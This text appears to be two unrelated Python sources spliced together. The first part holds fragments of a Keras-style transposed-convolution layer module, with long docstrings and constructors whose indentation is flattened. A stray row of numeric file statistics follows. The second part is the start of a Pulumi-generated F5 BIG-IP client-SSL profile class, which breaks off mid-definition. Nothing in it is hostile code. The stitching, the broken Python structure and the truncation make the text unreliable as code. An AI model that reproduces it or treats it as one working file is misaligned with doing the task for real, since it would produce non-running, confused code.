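def conv_transpose(x):
    # stand-in for convTranspose(x, W): here, just scale each value
    return [2.0 * v for v in x]

def normalize(y):
    # stand-in for normalization(., gamma, beta): here, mean-centering
    m = sum(y) / len(y)
    return [v - m for v in y]

def activate(z):
    # stand-in for activation(., alpha): here, a plain ReLU
    return [max(v, 0.0) for v in z]

def aconv_transpose_block(x):
    # output = activation( normalization( convTranspose(x, W), ... ), ... )
    return activate(normalize(conv_transpose(x)))
```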
Arguments for convolution:
filters: Integer, the dimensionality of the output space
(i.e. the number of output filters in the convolution).
kernel_size: An integer or tuple/list of 2 integers, specifying the
height and width of the 2D convolution window.
Can be a single integer to specify the same value for
all spatial dimensions.
strides: An integer or tuple/list of 2 integers,
specifying the strides of the convolution along the height and width.
Can be a single integer to specify the same value for
all spatial dimensions.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
        lgroups: Latent group number of group convolution. Group convolution
            is used only when this value is set. The latent filter number of
            group convolution would be inferred by lfilters = filters // lgroups.
            Hence, filters should be a multiple of lgroups.
padding: one of `"valid"` or `"same"` (case-insensitive).
        output_mshape: (Only available for new-style API) An integer or tuple/list
            of the desired output shape. When setting this option, `output_padding`
            and `out_cropping` would be inferred from the input shape, so any
            values the user passes for those two options would be ignored.
            A recommended way to use this option is:
`AConv(..., output_mshape=tensor.get_shape())`
output_padding: An integer or tuple/list of 2 integers,
specifying the amount of padding along the height and width
of the output tensor.
Can be a single integer to specify the same value for all
spatial dimensions.
The amount of output padding along a given dimension must be
lower than the stride along that same dimension.
If set to `None` (default), the output shape would not be padded.
        out_cropping: (Only available for new-style API) An integer or tuple/list
of n integers, specifying the amount of cropping along the axes of the
output tensor. The amount of output cropping along a given dimension must
be lower than the stride along that same dimension.
If set to `None` (default), the output shape would not be cropped.
data_format: A string,
one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, height, width, channels)` while `channels_first`
corresponds to inputs with shape
`(batch, channels, height, width)`.
It defaults to the `image_data_format` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "channels_last".
dilation_rate: an integer or tuple/list of 2 integers, specifying
the dilation rate to use for dilated convolution.
Can be a single integer to specify the same value for
all spatial dimensions.
Currently, specifying any `dilation_rate` value != 1 is
incompatible with specifying any stride value != 1.
kernel_initializer: An initializer for the convolution kernel.
kernel_regularizer: Optional regularizer for the convolution kernel.
kernel_constraint: Optional projection function to be applied to the
kernel after being updated by an `Optimizer` (e.g. used to implement
norm constraints or value constraints for layer weights). The function
must take as input the unprojected variable and must return the
projected variable (which must have the same shape). Constraints are
not safe to use when doing asynchronous distributed training.
trainable: Boolean, if `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
name: A string, the name of the layer.
Arguments for normalization:
normalization: The normalization type, which could be
(1) None: do not use normalization and do not add biases.
(2) bias: apply biases instead of using normalization.
(3) batch: use batch normalization.
(4) inst : use instance normalization.
(5) group: use group normalization.
If using (2), the initializer, regularizer and constraint for
beta would be applied to the bias of convolution.
beta_initializer: Initializer for the beta weight.
gamma_initializer: Initializer for the gamma weight.
beta_regularizer: Optional regularizer for the beta weight.
gamma_regularizer: Optional regularizer for the gamma weight.
beta_constraint: Optional constraint for the beta weight.
gamma_constraint: Optional constraint for the gamma weight.
groups (only for group normalization): Integer, the number of
groups for Group Normalization.
Can be in the range [1, N] where N is the input dimension.
The input dimension must be divisible by the number of groups.
Arguments for activation:
activation: Activation function to use
(see [activations](../activations.md)).
If you don't specify anything, no activation is applied
            (i.e. "linear" activation: `a(x) = x`).
activity_config: keywords for the parameters of activation
function (only for lrelu).
Arguments (others):
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation").
(see [regularizer](../regularizers.md)).
Input shape:
4D tensor with shape:
`(batch, channels, rows, cols)` if data_format='channels_first'
or 4D tensor with shape:
`(batch, rows, cols, channels)` if data_format='channels_last'.
Output shape:
4D tensor with shape:
`(batch, filters, new_rows, new_cols)` if data_format='channels_first'
or 4D tensor with shape:
`(batch, new_rows, new_cols, filters)` if data_format='channels_last'.
`rows` and `cols` values might have changed due to padding.
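    The per-dimension shape change can be sketched as below; `infer_cropping`
    is a hypothetical illustration of how a desired `output_mshape` could be
    turned into a cropping amount (the actual inference in `_AConvTranspose`
    may differ):

```python
def deconv_length(n, k, s, padding='valid', output_padding=0):
    # Per-dimension transposed-convolution output length (standard formula;
    # assumed to match the arithmetic this layer family uses).
    base = n * s + (max(k - s, 0) if padding == 'valid' else 0)
    return base + output_padding

def infer_cropping(target, n, k, s, padding='valid'):
    # Hypothetical sketch: compute the natural output length, then crop
    # back down to the requested size.
    natural = deconv_length(n, k, s, padding)
    if natural < target:
        raise ValueError('target exceeds the natural output length')
    return natural - target

# 2D case: rows and cols are handled independently.
new_rows = deconv_length(16, 4, 2, 'same')        # 16 rows upsampled to 32
col_crop = infer_cropping(30, 16, 4, 2, 'same')   # crop 2 to reach 30 cols
```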
References:
- [A guide to convolution arithmetic for deep
learning](https://arxiv.org/abs/1603.07285v1)
- [Deconvolutional
Networks](http://www.matthewzeiler.com/pubs/cvpr2010/cvpr2010.pdf)
"""
def __init__(self, filters,
kernel_size,
strides=(1, 1),
lgroups=None,
padding='valid',
output_mshape=None,
output_padding=None,
output_cropping=None,
data_format=None,
dilation_rate=(1, 1),
kernel_initializer='glorot_uniform',
kernel_regularizer=None,
kernel_constraint=None,
normalization='inst',
beta_initializer='zeros',
gamma_initializer='ones',
beta_regularizer=None,
gamma_regularizer=None,
beta_constraint=None,
gamma_constraint=None,
groups=32,
activation=None,
activity_config=None,
activity_regularizer=None,
**kwargs):
super(AConv2DTranspose, self).__init__(
rank=2,
filters=filters,
kernel_size=kernel_size,
strides=strides,
lgroups=lgroups,
padding=padding,
output_mshape=output_mshape,
output_padding=output_padding,
output_cropping=output_cropping,
data_format=data_format,
dilation_rate=dilation_rate,
kernel_initializer=initializers.get(kernel_initializer),
kernel_regularizer=regularizers.get(kernel_regularizer),
kernel_constraint=constraints.get(kernel_constraint),
normalization=normalization,
beta_initializer=initializers.get(beta_initializer),
gamma_initializer=initializers.get(gamma_initializer),
beta_regularizer=regularizers.get(beta_regularizer),
gamma_regularizer=regularizers.get(gamma_regularizer),
beta_constraint=constraints.get(beta_constraint),
gamma_constraint=constraints.get(gamma_constraint),
groups=groups,
activation=activation,
activity_config=activity_config,
activity_regularizer=regularizers.get(activity_regularizer),
**kwargs)
class AConv3DTranspose(_AConvTranspose):
"""Modern transposed convolution layer (sometimes called Deconvolution).
The need for transposed convolutions generally arises
from the desire to use a transformation going in the opposite direction
of a normal convolution, i.e., from something that has the shape of the
output of some convolution to something that has the shape of its input
while maintaining a connectivity pattern that is compatible with
said convolution.
When using this layer as the first layer in a model,
provide the keyword argument `input_shape`
(tuple of integers, does not include the sample axis),
e.g. `input_shape=(128, 128, 128, 3)` for a 128x128x128 volume with 3 channels
if `data_format="channels_last"`.
    The abstract architecture of AConv3DTranspose is:
`output = activation( normalization( convTranspose(x, W), gamma, beta ), alpha )`
This layer is a stack of transposed convolution, normalization and activation.
As an extension, we allow users to use activating layers with parameters
like PRelu.
Arguments for convolution:
filters: Integer, the dimensionality of the output space
(i.e. the number of output filters in the convolution).
kernel_size: An integer or tuple/list of 3 integers, specifying the
depth, height and width of the 3D convolution window.
Can be a single integer to specify the same value for
all spatial dimensions.
strides: An integer or tuple/list of 3 integers,
specifying the strides of the convolution along the depth, height
and width.
Can be a single integer to specify the same value for
all spatial dimensions.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
        lgroups: Latent group number of group convolution. Group convolution
            is used only when this value is set. The latent filter number of
            group convolution would be inferred by lfilters = filters // lgroups.
            Hence, filters should be a multiple of lgroups.
padding: one of `"valid"` or `"same"` (case-insensitive).
        output_mshape: (Only available for new-style API) An integer or tuple/list
            of the desired output shape. When setting this option, `output_padding`
            and `out_cropping` would be inferred from the input shape, so any
            values the user passes for those two options would be ignored.
            A recommended way to use this option is:
`AConv(..., output_mshape=tensor.get_shape())`
output_padding: An integer or tuple/list of 3 integers,
specifying the amount of padding along the depth, height, and
width.
Can be a single integer to specify the same value for all
spatial dimensions.
The amount of output padding along a given dimension must be
lower than the stride along that same dimension.
If set to `None` (default), the output shape is inferred.
        out_cropping: (Only available for new-style API) An integer or tuple/list
of n integers, specifying the amount of cropping along the axes of the
output tensor. The amount of output cropping along a given dimension must
be lower than the stride along that same dimension.
If set to `None` (default), the output shape would not be cropped.
data_format: A string,
one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, depth, height, width, channels)` while `channels_first`
corresponds to inputs with shape
`(batch, channels, depth, height, width)`.
It defaults to the `image_data_format` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "channels_last".
dilation_rate: an integer or tuple/list of 3 integers, specifying
the dilation rate to use for dilated convolution.
Can be a single integer to specify the same value for
all spatial dimensions.
Currently, specifying any `dilation_rate` value != 1 is
incompatible with specifying any stride value != 1.
kernel_initializer: An initializer for the convolution kernel.
kernel_regularizer: Optional regularizer for the convolution kernel.
kernel_constraint: Optional projection function to be applied to the
kernel after being updated by an `Optimizer` (e.g. used to implement
norm constraints or value constraints for layer weights). The function
must take as input the unprojected variable and must return the
projected variable (which must have the same shape). Constraints are
not safe to use when doing asynchronous distributed training.
trainable: Boolean, if `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
name: A string, the name of the layer.
Arguments for normalization:
normalization: The normalization type, which could be
(1) None: do not use normalization and do not add biases.
(2) bias: apply biases instead of using normalization.
(3) batch: use batch normalization.
(4) inst : use instance normalization.
(5) group: use group normalization.
If using (2), the initializer, regularizer and constraint for
beta would be applied to the bias of convolution.
beta_initializer: Initializer for the beta weight.
gamma_initializer: Initializer for the gamma weight.
beta_regularizer: Optional regularizer for the beta weight.
gamma_regularizer: Optional regularizer for the gamma weight.
beta_constraint: Optional constraint for the beta weight.
gamma_constraint: Optional constraint for the gamma weight.
groups (only for group normalization): Integer, the number of
groups for Group Normalization.
Can be in the range [1, N] where N is the input dimension.
The input dimension must be divisible by the number of groups.
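    The divisibility constraint above can be checked with a small helper
    (a hypothetical validator for illustration; the layer's own checks may
    be implemented differently):

```python
def check_groups(channels, groups):
    # Hypothetical validator: `groups` must lie in [1, channels] and
    # divide the channel dimension evenly.
    if not 1 <= groups <= channels:
        raise ValueError('groups must be in [1, %d]' % channels)
    if channels % groups != 0:
        raise ValueError('channels (%d) must be divisible by groups (%d)'
                         % (channels, groups))
    return channels // groups  # channels per group
```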
Arguments for activation:
activation: Activation function to use
(see [activations](../activations.md)).
If you don't specify anything, no activation is applied
            (i.e. "linear" activation: `a(x) = x`).
activity_config: keywords for the parameters of activation
function (only for lrelu).
Arguments (others):
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation").
(see [regularizer](../regularizers.md)).
Input shape:
5D tensor with shape:
`(batch, channels, depth, rows, cols)` if data_format='channels_first'
or 5D tensor with shape:
`(batch, depth, rows, cols, channels)` if data_format='channels_last'.
Output shape:
5D tensor with shape:
`(batch, filters, new_depth, new_rows, new_cols)` if
data_format='channels_first'
or 5D tensor with shape:
`(batch, new_depth, new_rows, new_cols, filters)` if
data_format='channels_last'.
`depth` and `rows` and `cols` values might have changed due to padding.
References:
- [A guide to convolution arithmetic for deep
learning](https://arxiv.org/abs/1603.07285v1)
- [Deconvolutional
Networks](http://www.matthewzeiler.com/pubs/cvpr2010/cvpr2010.pdf)
"""
def __init__(self, filters,
kernel_size,
strides=(1, 1, 1),
lgroups=None,
padding='valid',
output_mshape=None,
output_padding=None,
output_cropping=None,
data_format=None,
dilation_rate=(1, 1, 1),
kernel_initializer='glorot_uniform',
kernel_regularizer=None,
kernel_constraint=None,
normalization='inst',
beta_initializer='zeros',
gamma_initializer='ones',
beta_regularizer=None,
gamma_regularizer=None,
beta_constraint=None,
gamma_constraint=None,
groups=32,
activation=None,
activity_config=None,
activity_regularizer=None,
**kwargs):
super(AConv3DTranspose, self).__init__(
rank=3,
filters=filters,
kernel_size=kernel_size,
strides=strides,
lgroups=lgroups,
padding=padding,
output_mshape=output_mshape,
output_padding=output_padding,
output_cropping=output_cropping,
data_format=data_format,
dilation_rate=dilation_rate,
kernel_initializer=initializers.get(kernel_initializer),
kernel_regularizer=regularizers.get(kernel_regularizer),
kernel_constraint=constraints.get(kernel_constraint),
normalization=normalization,
beta_initializer=initializers.get(beta_initializer),
gamma_initializer=initializers.get(gamma_initializer),
beta_regularizer=regularizers.get(beta_regularizer),
gamma_regularizer=regularizers.get(gamma_regularizer),
beta_constraint=constraints.get(beta_constraint),
gamma_constraint=constraints.get(gamma_constraint),
groups=groups,
activation=activation,
activity_config=activity_config,
activity_regularizer=regularizers.get(activity_regularizer),
**kwargs)
| 52.583722 | 218 | 0.617047 | 17,747 | 157,646 | 5.339043 | 0.037415 | 0.017731 | 0.011778 | 0.008612 | 0.92359 | 0.908171 | 0.894387 | 0.883939 | 0.872393 | 0.862779 | 0 | 0.009603 | 0.313671 | 157,646 | 2,997 | 219 | 52.601268 | 0.866133 | 0.467015 | 0 | 0.846595 | 0 | 0.00191 | 0.043037 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.024188 | false | 0 | 0.011458 | 0.000637 | 0.059198 | 0.000637 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ProfileClientSslArgs', 'ProfileClientSsl']
@pulumi.input_type
class ProfileClientSslArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
alert_timeout: Optional[pulumi.Input[str]] = None,
allow_non_ssl: Optional[pulumi.Input[str]] = None,
authenticate: Optional[pulumi.Input[str]] = None,
authenticate_depth: Optional[pulumi.Input[int]] = None,
c3d_client_fallback_cert: Optional[pulumi.Input[str]] = None,
c3d_drop_unknown_ocsp_status: Optional[pulumi.Input[str]] = None,
c3d_ocsp: Optional[pulumi.Input[str]] = None,
ca_file: Optional[pulumi.Input[str]] = None,
cache_size: Optional[pulumi.Input[int]] = None,
cache_timeout: Optional[pulumi.Input[int]] = None,
cert: Optional[pulumi.Input[str]] = None,
cert_extension_includes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
cert_key_chains: Optional[pulumi.Input[Sequence[pulumi.Input['ProfileClientSslCertKeyChainArgs']]]] = None,
cert_life_span: Optional[pulumi.Input[int]] = None,
cert_lookup_by_ipaddr_port: Optional[pulumi.Input[str]] = None,
chain: Optional[pulumi.Input[str]] = None,
ciphers: Optional[pulumi.Input[str]] = None,
client_cert_ca: Optional[pulumi.Input[str]] = None,
crl_file: Optional[pulumi.Input[str]] = None,
defaults_from: Optional[pulumi.Input[str]] = None,
forward_proxy_bypass_default_action: Optional[pulumi.Input[str]] = None,
full_path: Optional[pulumi.Input[str]] = None,
generation: Optional[pulumi.Input[int]] = None,
generic_alert: Optional[pulumi.Input[str]] = None,
handshake_timeout: Optional[pulumi.Input[str]] = None,
inherit_cert_keychain: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None,
mod_ssl_methods: Optional[pulumi.Input[str]] = None,
mode: Optional[pulumi.Input[str]] = None,
partition: Optional[pulumi.Input[str]] = None,
passphrase: Optional[pulumi.Input[str]] = None,
peer_cert_mode: Optional[pulumi.Input[str]] = None,
proxy_ca_cert: Optional[pulumi.Input[str]] = None,
proxy_ca_key: Optional[pulumi.Input[str]] = None,
proxy_ca_passphrase: Optional[pulumi.Input[str]] = None,
proxy_ssl: Optional[pulumi.Input[str]] = None,
proxy_ssl_passthrough: Optional[pulumi.Input[str]] = None,
renegotiate_period: Optional[pulumi.Input[str]] = None,
renegotiate_size: Optional[pulumi.Input[str]] = None,
renegotiation: Optional[pulumi.Input[str]] = None,
retain_certificate: Optional[pulumi.Input[str]] = None,
secure_renegotiation: Optional[pulumi.Input[str]] = None,
server_name: Optional[pulumi.Input[str]] = None,
session_mirroring: Optional[pulumi.Input[str]] = None,
session_ticket: Optional[pulumi.Input[str]] = None,
sni_default: Optional[pulumi.Input[str]] = None,
sni_require: Optional[pulumi.Input[str]] = None,
ssl_c3d: Optional[pulumi.Input[str]] = None,
ssl_forward_proxy: Optional[pulumi.Input[str]] = None,
ssl_forward_proxy_bypass: Optional[pulumi.Input[str]] = None,
ssl_sign_hash: Optional[pulumi.Input[str]] = None,
strict_resume: Optional[pulumi.Input[str]] = None,
tm_options: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
unclean_shutdown: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a ProfileClientSsl resource.
:param pulumi.Input[str] name: Specifies the name of the profile.Name of Profile should be full path.The full path is the combination of the `partition + profile name`,For example `/Common/test-clientssl-profile`.
:param pulumi.Input[str] alert_timeout: Alert time out
        :param pulumi.Input[str] allow_non_ssl: Enables or disables acceptance of non-SSL connections. When creating a new profile, the setting is provided by the parent profile
:param pulumi.Input[str] authenticate: Specifies the frequency of client authentication for an SSL session.When `once`,specifies that the system authenticates the client once for an SSL session.
When `always`, specifies that the system authenticates the client once for an SSL session and also upon reuse of that session.
:param pulumi.Input[int] authenticate_depth: Specifies the maximum number of certificates to be traversed in a client certificate chain
:param pulumi.Input[str] c3d_client_fallback_cert: Specifies the client certificate to use in SSL client certificate constrained delegation. This certificate will be used if client does not provide a cert during the SSL handshake. The default value is none.
        :param pulumi.Input[str] c3d_drop_unknown_ocsp_status: Specifies the BIG-IP action when the OCSP responder returns unknown status. The default value is drop, which causes the connection to be dropped. Conversely, you can specify ignore, which causes the connection to ignore the unknown status and continue.
:param pulumi.Input[str] c3d_ocsp: Specifies the SSL client certificate constrained delegation OCSP object that the BIG-IP SSL should use to connect to the OCSP responder and check the client certificate status.
:param pulumi.Input[str] ca_file: Client certificate file path. Default None.
:param pulumi.Input[int] cache_size: Cache size (sessions).
:param pulumi.Input[int] cache_timeout: Cache time out
:param pulumi.Input[str] cert: Specifies a cert name for use.
:param pulumi.Input[Sequence[pulumi.Input[str]]] cert_extension_includes: Cert extension includes for ssl forward proxy
:param pulumi.Input[int] cert_life_span: Life span of the certificate in days for ssl forward proxy
:param pulumi.Input[str] cert_lookup_by_ipaddr_port: Cert lookup by ip address and port enabled / disabled
:param pulumi.Input[str] chain: Contains a certificate chain that is relevant to the certificate and key mentioned earlier.This key is optional
:param pulumi.Input[str] ciphers: Specifies the list of ciphers that the system supports. When creating a new profile, the default cipher list is provided by the parent profile.
:param pulumi.Input[str] client_cert_ca: client certificate name
:param pulumi.Input[str] crl_file: Certificate revocation file name
        :param pulumi.Input[str] defaults_from: Parent profile for this clientssl profile. Once this value has been set, it cannot be changed. Default value is `/Common/clientssl`. It should be a full path `/partition/profile_name`
:param pulumi.Input[str] forward_proxy_bypass_default_action: Forward proxy bypass default action. (enabled / disabled)
:param pulumi.Input[str] full_path: full path of the profile
:param pulumi.Input[int] generation: generation
:param pulumi.Input[str] generic_alert: Generic alerts enabled / disabled.
:param pulumi.Input[str] handshake_timeout: Handshake time out (seconds)
:param pulumi.Input[str] inherit_cert_keychain: Inherit cert key chain
:param pulumi.Input[str] key: Contains a key name
:param pulumi.Input[str] mod_ssl_methods: ModSSL Methods enabled / disabled. Default is disabled.
:param pulumi.Input[str] mode: ModSSL Methods enabled / disabled. Default is disabled.
:param pulumi.Input[str] partition: name of partition
:param pulumi.Input[str] passphrase: Client Certificate Constrained Delegation CA passphrase
        :param pulumi.Input[str] peer_cert_mode: Specifies the way the system handles client certificates. When ignore, specifies that the system ignores certificates from client systems. When require, specifies that the system requires a client to present a valid certificate. When request, specifies that the system requests a valid certificate from a client but always authenticates the client.
:param pulumi.Input[str] proxy_ca_cert: Proxy CA Cert
:param pulumi.Input[str] proxy_ca_key: Proxy CA Key
:param pulumi.Input[str] proxy_ca_passphrase: Proxy CA Passphrase
:param pulumi.Input[str] proxy_ssl: Proxy SSL enabled / disabled. Default is disabled.
:param pulumi.Input[str] proxy_ssl_passthrough: Proxy SSL passthrough enabled / disabled. Default is disabled.
        :param pulumi.Input[str] renegotiate_period: Renegotiate Period (seconds)
        :param pulumi.Input[str] renegotiate_size: Renegotiate Size
:param pulumi.Input[str] renegotiation: Enables or disables SSL renegotiation.When creating a new profile, the setting is provided by the parent profile
:param pulumi.Input[str] retain_certificate: When `true`, client certificate is retained in SSL session.
:param pulumi.Input[str] secure_renegotiation: Specifies the method of secure renegotiations for SSL connections. When creating a new profile, the setting is provided by the parent profile.
               When `request` is set, the system requests secure renegotiation of SSL connections.
               `require` is the default setting; when set, the system permits initial SSL handshakes from clients but terminates renegotiations from unpatched clients.
               With the `require-strict` setting, the system requires strict renegotiation of SSL connections; in this mode the system refuses connections to insecure servers and terminates existing SSL connections to insecure servers.
:param pulumi.Input[str] server_name: Specifies the fully qualified DNS hostname of the server used in Server Name Indication communications. When creating a new profile, the setting is provided by the parent profile.The server name can also be a wildcard string containing the asterisk `*` character.
:param pulumi.Input[str] session_mirroring: Session Mirroring (enabled / disabled)
:param pulumi.Input[str] session_ticket: Session Ticket (enabled / disabled)
:param pulumi.Input[str] sni_default: Indicates that the system uses this profile as the default SSL profile when there is no match to the server name, or when the client provides no SNI extension support.When creating a new profile, the setting is provided by the parent profile.
There can be only one SSL profile with this setting enabled.
:param pulumi.Input[str] sni_require: Requires that the network peers also provide SNI support, this setting only takes effect when `sni_default` is set to `true`.When creating a new profile, the setting is provided by the parent profile
:param pulumi.Input[str] ssl_c3d: Enables or disables SSL client certificate constrained delegation. The default option is disabled. Conversely, you can specify enabled to use the SSL client certificate constrained delegation.
:param pulumi.Input[str] ssl_forward_proxy: Specifies whether SSL forward proxy feature is enabled or not. The default value is disabled.
:param pulumi.Input[str] ssl_forward_proxy_bypass: Specifies whether SSL forward proxy bypass feature is enabled or not. The default value is disabled.
:param pulumi.Input[str] ssl_sign_hash: SSL sign hash (any, sha1, sha256, sha384)
:param pulumi.Input[str] strict_resume: Enables or disables the resumption of SSL sessions after an unclean shutdown.When creating a new profile, the setting is provided by the parent profile.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tm_options: List of Enabled selection from a set of industry standard options for handling SSL processing.By default,
Don't insert empty fragments and No TLSv1.3 are listed as Enabled Options. `Usage` : tm_options = ["dont-insert-empty-fragments","no-tlsv1.3"]
:param pulumi.Input[str] unclean_shutdown: Unclean Shutdown (enabled / disabled)
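        A minimal configuration sketch of constructing these args (values are
        placeholders; only a few of the optional parameters are shown):

```python
# Hypothetical construction of the args object; values are placeholders.
import pulumi_f5bigip as f5bigip

args = f5bigip.ltm.ProfileClientSslArgs(
    name="/Common/test-clientssl-profile",
    defaults_from="/Common/clientssl",
    tm_options=["dont-insert-empty-fragments", "no-tlsv1.3"],
)
```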
"""
pulumi.set(__self__, "name", name)
if alert_timeout is not None:
pulumi.set(__self__, "alert_timeout", alert_timeout)
if allow_non_ssl is not None:
pulumi.set(__self__, "allow_non_ssl", allow_non_ssl)
if authenticate is not None:
pulumi.set(__self__, "authenticate", authenticate)
if authenticate_depth is not None:
pulumi.set(__self__, "authenticate_depth", authenticate_depth)
if c3d_client_fallback_cert is not None:
pulumi.set(__self__, "c3d_client_fallback_cert", c3d_client_fallback_cert)
if c3d_drop_unknown_ocsp_status is not None:
pulumi.set(__self__, "c3d_drop_unknown_ocsp_status", c3d_drop_unknown_ocsp_status)
if c3d_ocsp is not None:
pulumi.set(__self__, "c3d_ocsp", c3d_ocsp)
if ca_file is not None:
pulumi.set(__self__, "ca_file", ca_file)
if cache_size is not None:
pulumi.set(__self__, "cache_size", cache_size)
if cache_timeout is not None:
pulumi.set(__self__, "cache_timeout", cache_timeout)
if cert is not None:
pulumi.set(__self__, "cert", cert)
if cert_extension_includes is not None:
pulumi.set(__self__, "cert_extension_includes", cert_extension_includes)
if cert_key_chains is not None:
pulumi.set(__self__, "cert_key_chains", cert_key_chains)
if cert_life_span is not None:
pulumi.set(__self__, "cert_life_span", cert_life_span)
if cert_lookup_by_ipaddr_port is not None:
pulumi.set(__self__, "cert_lookup_by_ipaddr_port", cert_lookup_by_ipaddr_port)
if chain is not None:
pulumi.set(__self__, "chain", chain)
if ciphers is not None:
pulumi.set(__self__, "ciphers", ciphers)
if client_cert_ca is not None:
pulumi.set(__self__, "client_cert_ca", client_cert_ca)
if crl_file is not None:
pulumi.set(__self__, "crl_file", crl_file)
if defaults_from is not None:
pulumi.set(__self__, "defaults_from", defaults_from)
if forward_proxy_bypass_default_action is not None:
pulumi.set(__self__, "forward_proxy_bypass_default_action", forward_proxy_bypass_default_action)
if full_path is not None:
pulumi.set(__self__, "full_path", full_path)
if generation is not None:
pulumi.set(__self__, "generation", generation)
if generic_alert is not None:
pulumi.set(__self__, "generic_alert", generic_alert)
if handshake_timeout is not None:
pulumi.set(__self__, "handshake_timeout", handshake_timeout)
if inherit_cert_keychain is not None:
pulumi.set(__self__, "inherit_cert_keychain", inherit_cert_keychain)
if key is not None:
pulumi.set(__self__, "key", key)
if mod_ssl_methods is not None:
pulumi.set(__self__, "mod_ssl_methods", mod_ssl_methods)
if mode is not None:
pulumi.set(__self__, "mode", mode)
if partition is not None:
pulumi.set(__self__, "partition", partition)
if passphrase is not None:
pulumi.set(__self__, "passphrase", passphrase)
if peer_cert_mode is not None:
pulumi.set(__self__, "peer_cert_mode", peer_cert_mode)
if proxy_ca_cert is not None:
pulumi.set(__self__, "proxy_ca_cert", proxy_ca_cert)
if proxy_ca_key is not None:
pulumi.set(__self__, "proxy_ca_key", proxy_ca_key)
if proxy_ca_passphrase is not None:
pulumi.set(__self__, "proxy_ca_passphrase", proxy_ca_passphrase)
if proxy_ssl is not None:
pulumi.set(__self__, "proxy_ssl", proxy_ssl)
if proxy_ssl_passthrough is not None:
pulumi.set(__self__, "proxy_ssl_passthrough", proxy_ssl_passthrough)
if renegotiate_period is not None:
pulumi.set(__self__, "renegotiate_period", renegotiate_period)
if renegotiate_size is not None:
pulumi.set(__self__, "renegotiate_size", renegotiate_size)
if renegotiation is not None:
pulumi.set(__self__, "renegotiation", renegotiation)
if retain_certificate is not None:
pulumi.set(__self__, "retain_certificate", retain_certificate)
if secure_renegotiation is not None:
pulumi.set(__self__, "secure_renegotiation", secure_renegotiation)
if server_name is not None:
pulumi.set(__self__, "server_name", server_name)
if session_mirroring is not None:
pulumi.set(__self__, "session_mirroring", session_mirroring)
if session_ticket is not None:
pulumi.set(__self__, "session_ticket", session_ticket)
if sni_default is not None:
pulumi.set(__self__, "sni_default", sni_default)
if sni_require is not None:
pulumi.set(__self__, "sni_require", sni_require)
if ssl_c3d is not None:
pulumi.set(__self__, "ssl_c3d", ssl_c3d)
if ssl_forward_proxy is not None:
pulumi.set(__self__, "ssl_forward_proxy", ssl_forward_proxy)
if ssl_forward_proxy_bypass is not None:
pulumi.set(__self__, "ssl_forward_proxy_bypass", ssl_forward_proxy_bypass)
if ssl_sign_hash is not None:
pulumi.set(__self__, "ssl_sign_hash", ssl_sign_hash)
if strict_resume is not None:
pulumi.set(__self__, "strict_resume", strict_resume)
if tm_options is not None:
pulumi.set(__self__, "tm_options", tm_options)
if unclean_shutdown is not None:
pulumi.set(__self__, "unclean_shutdown", unclean_shutdown)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
Specifies the name of the profile. The name should be the full path, which is the combination of the `partition + profile name`, for example `/Common/test-clientssl-profile`.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="alertTimeout")
def alert_timeout(self) -> Optional[pulumi.Input[str]]:
"""
Alert time out
"""
return pulumi.get(self, "alert_timeout")
@alert_timeout.setter
def alert_timeout(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "alert_timeout", value)
@property
@pulumi.getter(name="allowNonSsl")
def allow_non_ssl(self) -> Optional[pulumi.Input[str]]:
"""
Enables or disables acceptance of non-SSL connections. When creating a new profile, the setting is provided by the parent profile.
"""
return pulumi.get(self, "allow_non_ssl")
@allow_non_ssl.setter
def allow_non_ssl(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "allow_non_ssl", value)
@property
@pulumi.getter
def authenticate(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the frequency of client authentication for an SSL session. When `once`, the system authenticates the client once per SSL session.
When `always`, the system authenticates the client once per SSL session and also upon reuse of that session.
"""
return pulumi.get(self, "authenticate")
@authenticate.setter
def authenticate(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "authenticate", value)
@property
@pulumi.getter(name="authenticateDepth")
def authenticate_depth(self) -> Optional[pulumi.Input[int]]:
"""
Specifies the maximum number of certificates to be traversed in a client certificate chain
"""
return pulumi.get(self, "authenticate_depth")
@authenticate_depth.setter
def authenticate_depth(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "authenticate_depth", value)
@property
@pulumi.getter(name="c3dClientFallbackCert")
def c3d_client_fallback_cert(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the client certificate to use in SSL client certificate constrained delegation. This certificate is used if the client does not provide a certificate during the SSL handshake. The default value is `none`.
"""
